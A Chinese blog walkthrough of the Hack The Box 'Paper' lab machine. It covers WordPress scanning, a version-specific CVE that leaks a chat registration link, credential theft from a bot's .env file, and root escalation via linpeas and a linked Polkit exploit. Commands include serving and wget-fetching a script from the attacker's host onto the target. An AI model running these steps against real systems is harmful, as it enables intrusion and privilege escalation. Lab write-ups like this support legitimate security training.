渗透paper靶机


信息收集

进行信息收集

img

漏洞查找

发现打开了80端口访问使用inspect element -> network 就发现了X-Backend-Server包含潜在的内部/隐藏ip地址或主机名的表头

img

将响应头域名配到/etc/hosts上面

img

发现是一个WordPress网站

img

使用wpscan扫描一下

img

img

漏洞利用

发现WordPress版本是5.2.3

我们可以在网上找到该版本的cve

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

所以我们使用这个漏洞发现了一个纰漏

img

译文:

img

我们从这里得到了他们员工内部秘密聊天的注册网址

http://chat.office.paper/register/8qozr226AhkCHZdyY

记住要把网址添加进hosts才能访问

10.10.11.143 chat.office.paper

img

随便注册一个账号进入聊天系统

img

img

在这个群聊里面发现了这个机器人

由于这个群里只读所以我们跟机器人私聊

img

查看文件在上级目录中找到了hubot文件

img

里面有.env文件

img

img

发现了账号密码,用ssh连接试试

img

成功进入

提权

使用linpeas.sh脚本获取提权信息

利用python开启http服务把脚本下载到靶机

Python -m SimpleHTTPServer 8082

可能python3改成了http.server就使用下面的方法

python3 -m http.server 8082

下载命令:wget http:// HTB的ip:8082/linpeas.sh

记住要给脚本777权限:chmod 777 linpeas.sh

在使用./linpeas.sh运行脚本

img

https://github.com/Almorabea/Polkit-exploit

下载脚本后运行就行了

img

提权成功虽然报错了但是能用就行

img

拿到flag

有问题可以问我哦,或者我那里出来问题麻烦你帮我指出来谢谢

QQ:195744492


文章作者: Pikachu
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Pikachu !
作者: Pikachu
  目录